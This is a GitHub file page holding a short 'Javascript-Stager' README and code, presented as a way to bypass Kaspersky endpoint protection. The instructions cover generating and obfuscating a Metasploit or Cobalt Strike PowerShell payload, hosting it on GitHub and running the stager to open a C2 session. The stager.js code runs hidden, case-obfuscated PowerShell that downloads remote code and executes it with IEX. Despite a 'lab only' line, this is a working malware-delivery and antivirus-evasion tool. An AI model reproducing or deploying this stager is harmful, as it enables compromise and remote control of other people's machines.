-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathJavascript-Stager
More file actions
16 lines (11 loc) · 781 Bytes
/
Javascript-Stager
File metadata and controls
16 lines (11 loc) · 781 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Please do just use this for education in your LAB!!!
An Javascript-Stager which for example bypass Kaspersky EPP
- Create a Powershell Payload with e.g. MSF or Cobalt Strike
- Obfuscate the Powershell Payload e.g. Invoke-Obfuscation
- Host the Powershell Payload for example on Github (without .ps1 could be helpful)
- Include the Github RAW Link in the stager.js template
- Execute the finished JS-Stager on your LAB-Endpoint
- When everything is fine ==> C2 Session is open
Stager.js
a=new ActiveXObject("wsCripT.sHell");
a.run('pOwersHeLl.eXe -NoP -w HiDDen -c $b=neW-ObJeCT nET.wEbClieNt;$b.pRoXy=[NeT.WeBreQueSt]::geTsyStEmweBprOxy();$b.prOxY.crEdEnTials=[NEt.crEdEnTiaLcaChe]::deFaUltcrEdeNtials;IEX $b.DowNlOadstRing(\'https://raw.githubusercontent.com/...\')', 0);